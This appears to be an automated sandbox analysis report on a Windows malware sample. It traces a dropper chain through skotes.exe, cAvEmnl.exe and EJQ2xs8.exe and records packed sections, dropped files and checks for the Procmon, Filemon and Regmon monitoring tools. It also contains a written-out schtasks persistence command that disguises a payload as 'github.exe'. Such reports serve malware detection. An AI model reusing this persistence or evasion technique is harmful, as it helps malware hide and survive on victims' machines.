                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe "C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\github.exe C:\Users\user\AppData\Roaming\github.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe "C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe "C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe "C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: github.lnk.7.drLNK file: ..\..\..\..\..\github.exe
                    Source: file.exeStatic file information: File size 1884160 > 1048576
                    Source: file.exeStatic PE information: Raw size of yguzlnpo is bigger than: 0x100000 < 0x19a400

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yguzlnpo:EW;fkybguvz:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeUnpacked PE file: 12.2.EJQ2xs8.exe.7d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dvpnmyli:EW;lhlewnhz:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: random[1].exe.6.drStatic PE information: real checksum: 0x1c8a64 should be: 0x1cac8d
                    Source: EJQ2xs8.exe.6.drStatic PE information: real checksum: 0x1ab3ef should be: 0x1adb14
                    Source: cAvEmnl.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x1a5ae
                    Source: cAvEmnl[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x1a5ae
                    Source: file.exeStatic PE information: real checksum: 0x1d6995 should be: 0x1d4568
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x1d6995 should be: 0x1d4568
                    Source: github.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x1a5ae
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: real checksum: 0x1ab3ef should be: 0x1adb14
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: yguzlnpo
                    Source: file.exeStatic PE information: section name: fkybguvz
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: yguzlnpo
                    Source: skotes.exe.0.drStatic PE information: section name: fkybguvz
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: cAvEmnl[1].exe.6.drStatic PE information: section name: U@7'
                    Source: cAvEmnl[1].exe.6.drStatic PE information: section name: XejnR
                    Source: cAvEmnl.exe.6.drStatic PE information: section name: U@7'
                    Source: cAvEmnl.exe.6.drStatic PE information: section name: XejnR
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: .idata
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: dvpnmyli
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: lhlewnhz
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: .taggant
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: .idata
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: dvpnmyli
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: lhlewnhz
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: .taggant
                    Source: random[1].exe.6.drStatic PE information: section name:
                    Source: random[1].exe.6.drStatic PE information: section name: .idata
                    Source: random[1].exe.6.drStatic PE information: section name:
                    Source: random[1].exe.6.drStatic PE information: section name: enyyijut
                    Source: random[1].exe.6.drStatic PE information: section name: ijrsozmw
                    Source: random[1].exe.6.drStatic PE information: section name: .taggant
                    Source: github.exe.7.drStatic PE information: section name: U@7'
                    Source: github.exe.7.drStatic PE information: section name: XejnR
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FBD91C push ecx; ret 6_2_00FBD92F
                    Source: file.exeStatic PE information: section name: entropy: 7.9841219629652915
                    Source: file.exeStatic PE information: section name: yguzlnpo entropy: 7.954610998694376
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.9841219629652915
                    Source: skotes.exe.0.drStatic PE information: section name: yguzlnpo entropy: 7.954610998694376
                    Source: cAvEmnl[1].exe.6.drStatic PE information: section name: U@7' entropy: 7.9871822316254475
                    Source: cAvEmnl.exe.6.drStatic PE information: section name: U@7' entropy: 7.9871822316254475
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: entropy: 7.928832262074926
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: dvpnmyli entropy: 7.95384464177905
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: entropy: 7.928832262074926
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: dvpnmyli entropy: 7.95384464177905
                    Source: random[1].exe.6.drStatic PE information: section name: entropy: 7.9860466380900865
                    Source: random[1].exe.6.drStatic PE information: section name: enyyijut entropy: 7.954642903618639
                    Source: github.exe.7.drStatic PE information: section name: U@7' entropy: 7.9871822316254475
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\EJQ2xs8[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeFile created: C:\Users\user\AppData\Roaming\github.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe"
